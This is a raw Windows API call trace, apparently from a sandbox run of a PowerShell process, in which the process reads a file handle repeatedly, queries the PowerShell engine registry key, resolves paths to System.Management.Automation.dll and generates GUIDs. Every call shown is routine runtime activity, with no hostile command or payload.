	[0728.395] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0728.395] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0728.395] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0728.395] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0728.396] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0728.396] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0728.399] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0728.399] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0728.400] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0728.400] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0728.400] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0728.400] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0728.401] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0728.401] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0728.401] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0728.402] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0728.402] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0728.402] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0728.402] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0728.403] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0728.403] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0728.403] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0728.404] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0728.404] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x1000, lpOverlapped=0x0) returned 1
	[0728.404] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0xf37, lpOverlapped=0x0) returned 1
	[0728.405] ReadFile (in: hFile=0x2e4, lpBuffer=0x352ea47, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352ea47*, lpNumberOfBytesRead=0xed098*=0x0, lpOverlapped=0x0) returned 1
	[0728.405] ReadFile (in: hFile=0x2e4, lpBuffer=0x352f3a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed098, lpOverlapped=0x0 | out: lpBuffer=0x352f3a8*, lpNumberOfBytesRead=0xed098*=0x0, lpOverlapped=0x0) returned 1
	[0728.405] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed128 | out: phkResult=0xed128*=0x2e4) returned 0x0
	[0728.405] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed0ac, lpData=0x0, lpcbData=0xed0a8*=0x0 | out: lpType=0xed0ac*=0x1, lpData=0x0, lpcbData=0xed0a8*=0x56) returned 0x0
	[0728.405] CoTaskMemAlloc (cb=0x5a) returned 0x1b976350
	[0728.405] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed07c, lpData=0x1b976350, lpcbData=0xed078*=0x56 | out: lpType=0xed07c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xed078*=0x56) returned 0x0
	[0728.405] CoTaskMemFree (pv=0x1b976350) 
	[0728.405] RegCloseKey (hKey=0x2e4) returned 0x0
	[0728.406] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0728.406] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0728.420] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xc8bf57d0, Data2=0x4c3d, Data3=0x47b8, Data4=([0]=0x82, [1]=0xe8, [2]=0xf8, [3]=0x9c, [4]=0xc5, [5]=0x8e, [6]=0x8e, [7]=0x4f))) returned 0x0
	[0728.420] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xfc6851f9, Data2=0xa03, Data3=0x4f21, Data4=([0]=0xbf, [1]=0xc1, [2]=0xd0, [3]=0x5b, [4]=0xff, [5]=0x6a, [6]=0x64, [7]=0xfe))) returned 0x0
	[0730.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0730.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0730.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0730.376] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x911b61ca, Data2=0xe8f0, Data3=0x46d8, Data4=([0]=0xad, [1]=0xe8, [2]=0x76, [3]=0x6d, [4]=0x33, [5]=0x8e, [6]=0x95, [7]=0x9f))) returned 0x0
	[0730.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0730.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0730.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0730.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0730.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0730.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0730.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0730.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0730.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0730.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0730.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0730.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0730.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0730.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0732.146] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0732.146] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0732.146] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0732.146] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0732.147] VirtualQuery (in: lpAddress=0xeb360, lpBuffer=0xec220, dwLength=0x30 | out: lpBuffer=0xec220*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0732.148] VirtualQuery (in: lpAddress=0xeb3f0, lpBuffer=0xec2b0, dwLength=0x30 | out: lpBuffer=0xec2b0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0732.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0732.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0732.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0732.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0732.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0732.150] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0732.150] VirtualQuery (in: lpAddress=0xebb70, lpBuffer=0xeca30, dwLength=0x30 | out: lpBuffer=0xeca30*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0732.151] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0732.151] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0732.151] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0732.151] VirtualQuery (in: lpAddress=0xebb70, lpBuffer=0xeca30, dwLength=0x30 | out: lpBuffer=0xeca30*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0732.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0732.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0732.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0732.153] VirtualQuery (in: lpAddress=0xebb70, lpBuffer=0xeca30, dwLength=0x30 | out: lpBuffer=0xeca30*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0732.156] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x3b8a97ea, Data2=0x7892, Data3=0x4158, Data4=([0]=0xae, [1]=0x44, [2]=0x2a, [3]=0x30, [4]=0x74, [5]=0x9b, [6]=0xe5, [7]=0x73))) returned 0x0
	[0732.162] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x480fc5c5, Data2=0xea28, Data3=0x463c, Data4=([0]=0x8b, [1]=0x95, [2]=0xd3, [3]=0x4c, [4]=0xc9, [5]=0xe9, [6]=0x39, [7]=0xd0))) returned 0x0
	[0732.163] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x534367c2, Data2=0xd2d4, Data3=0x433e, Data4=([0]=0x8c, [1]=0x27, [2]=0xf1, [3]=0xd6, [4]=0x24, [5]=0x40, [6]=0xbf, [7]=0xeb))) returned 0x0
	[0733.598] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x3eed9e75, Data2=0x5ab8, Data3=0x40b5, Data4=([0]=0x89, [1]=0x50, [2]=0x20, [3]=0x36, [4]=0xef, [5]=0x8f, [6]=0x25, [7]=0x49))) returned 0x0
	[0733.599] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x7413570f, Data2=0xd932, Data3=0x40ff, Data4=([0]=0xbf, [1]=0x64, [2]=0x5b, [3]=0xb2, [4]=0x70, [5]=0x83, [6]=0x33, [7]=0x23))) returned 0x0
	[0733.599] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xe6a186a8, Data2=0x2ca9, Data3=0x4fa3, Data4=([0]=0xb9, [1]=0xb4, [2]=0x7a, [3]=0xd4, [4]=0x4b, [5]=0x3a, [6]=0x5c, [7]=0x7))) returned 0x0
	[0733.599] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x4c519f1a, Data2=0xcb42, Data3=0x4aa4, Data4=([0]=0x85, [1]=0x56, [2]=0xa6, [3]=0x99, [4]=0xb0, [5]=0x5d, [6]=0x44, [7]=0xa5))) returned 0x0
	[0733.599] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xe10c1c9c, Data2=0x61d2, Data3=0x4f65, Data4=([0]=0x9e, [1]=0xb, [2]=0x98, [3]=0x99, [4]=0x6d, [5]=0x72, [6]=0xcf, [7]=0xf0))) returned 0x0
	[0733.600] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0x2830d5d4, Data2=0xac64, Data3=0x4de3, Data4=([0]=0xae, [1]=0xaa, [2]=0xc7, [3]=0x45, [4]=0xeb, [5]=0x28, [6]=0xcb, [7]=0x5b))) returned 0x0
	[0733.600] CoCreateGuid (in: pguid=0xed350 | out: pguid=0xed350*(Data1=0xce01634a, Data2=0xb000, Data3=0x4d08, Data4=([0]=0x91, [1]=0x60, [2]=0xee, [3]=0xd0, [4]=0xa8, [5]=0xb1, [6]=0x1a, [7]=0xe9))) returned 0x0
